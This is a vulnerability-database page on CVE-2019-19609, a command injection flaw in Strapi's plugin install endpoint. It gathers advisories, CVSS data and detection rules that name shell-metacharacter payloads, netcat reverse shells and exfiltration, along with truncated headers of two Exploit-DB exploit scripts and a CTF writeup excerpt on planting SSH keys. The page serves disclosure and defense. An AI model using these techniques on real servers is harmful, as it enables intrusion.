CVE-2019-19609
published 2019-12-05CVE-2019-19609: The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because…
PriorityP179high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
54.08%
98.9th percentile
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| strapi | strapi | <= 1.6.4 | — |
| strapi | strapi | — | — |
| strapi | strapi | >= 0 < 3.0.0-beta.17.8 | 3.0.0-beta.17.8 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to /admin/plugins/install endpoint with a 'plugin' field containing shell metacharacters such as '&&' or '$(' indicating command injection via the unsanitized plugin name parameter. ↗
- →Monitor for POST requests to /admin/plugins/install carrying a JSON body where the 'plugin' value contains shell command substitution patterns (e.g., '$(...)'). ↗
- →Alert on outbound netcat (nc) connections spawned by the Strapi/Node.js process, particularly to ephemeral attacker-controlled IPs on port 9999, as this is the default exfil port used by the public exploit. ↗
- →Detect creation of the file /tmp/.m3 by the Strapi process, which is used as a temporary output buffer by the authenticated RCE exploit. ↗
- →Monitor unauthenticated POST requests to /admin/auth/reset-password with a JSON body containing a MongoDB-style operator key '$gt' in the 'code' field, indicating exploitation of CVE-2019-18818 used as a precursor to this RCE. ↗
- →Flag requests to /admin/init endpoint that enumerate the Strapi version, as attackers use this to confirm a vulnerable version (3.0.0-beta.17.4 or lower) before launching the exploit. ↗
- ·The RCE is blind — command output is not returned inline in the HTTP response; attackers must use out-of-band channels (e.g., netcat reverse shell or curl to attacker-controlled server) to retrieve results. ↗
- ·The vulnerability affects Strapi versions up to and including 3.0.0-beta.17.7; the fix was introduced in 3.0.0-beta.17.8. ↗
- ·The injection point is the unsanitized 'plugin' name field passed to the execa function; both the Install (/admin/plugins/install) and Uninstall plugin endpoints are affected. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Duplicate Advisory: OS Command Injection in Strapi
osv·2021-12-10
CVE-2019-19609 [HIGH] Duplicate Advisory: OS Command Injection in Strapi
Duplicate Advisory: OS Command Injection in Strapi
### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9p2w-rmx4-9mw7. This link is maintained to preserve external references.
### Original Description
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
GHSA
Command Injection in strapi
ghsa·2020-09-04
CVE-2019-19609 [HIGH] CWE-77 Command Injection in strapi
Command Injection in strapi
Versions of `strapi` before 3.0.0-beta.17.8 are vulnerable to Command Injection. The package fails to sanitize plugin names in the `/admin/plugins/install/` route. This may allow an authenticated attacker with admin privileges to run arbitrary commands in the server.
## Recommendation
Upgrade to version 3.0.0-beta.17.8 or later
OSV
Command Injection in strapi
osv·2020-09-04
CVE-2019-19609 [HIGH] Command Injection in strapi
Command Injection in strapi
Versions of `strapi` before 3.0.0-beta.17.8 are vulnerable to Command Injection. The package fails to sanitize plugin names in the `/admin/plugins/install/` route. This may allow an authenticated attacker with admin privileges to run arbitrary commands in the server.
## Recommendation
Upgrade to version 3.0.0-beta.17.8 or later
VulnCheck
strapi strapi Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 7.2
CVE-2019-19609 [HIGH] strapi strapi Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
strapi strapi Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.
Affected: strapi strapi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2019-19609; https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf
Ex
No detection rules found.
Exploit-DB
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb·2021-08-30·CVSS 9.8
CVE-2019-18818 [CRITICAL] Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
---
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609
#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys
if len(sys.argv) != 2:
print("[-] Wrong number of arguments provided")
print("[*] Usage: python3 exploit.py \n")
sys.exit()
class Terminal(Cmd):
prompt = "$> "
def default(self, args):
code_exec(args)
def check_version():
global url
print("[+] Checking Strapi CMS Version running")
version = requ
Exploit-DB
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2021-08-30·CVSS 7.2
CVE-2019-19609 [HIGH] Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609
#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
import requests, sys, os, socket
logoType = ('''
CVE-2019-19609 - Strapi RCE
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
''')
if __name__ == '__main__':
# Parameter checking
if len(sys.argv) != 5:
print(logoType)
print("[!] Some of
CTF
Horizontall / README
ctf_writeups·CVSS 9.8
CVE-2019-18818 [CRITICAL] Horizontall / README
# Horizontall - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```.
***User***: Found subdomain ```api-prod``` on one of the JavaScript files, By enumerating the subdomain we found login page of ```Strapi``` system, Reset the ```admin``` password using ```CVE-2019-18818``` and using the same exploit we write our SSH public key to ```/opt/strapi/.ssh/authorized_keys``` directory which allows us to login using our SSH private key to get a shell as ```strapi``` user.
***Root***: Found local service on port ```8000``` (running as ```root```) which is```Laravel``` system, Using ```CVE-2021-3129``` we write our SSH public key to ```/root/.ssh/authorized_keys
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
http://packetstormsecurity.com/files/163940/Strapi-3.0.0-beta.17.7-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.htmlhttps://bittherapy.net/post/strapi-framework-remote-code-execution/https://github.com/strapi/strapi/pull/4636http://packetstormsecurity.com/files/163940/Strapi-3.0.0-beta.17.7-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.htmlhttps://bittherapy.net/post/strapi-framework-remote-code-execution/https://github.com/strapi/strapi/pull/4636
2019-12-05
Published
Exploited in the wild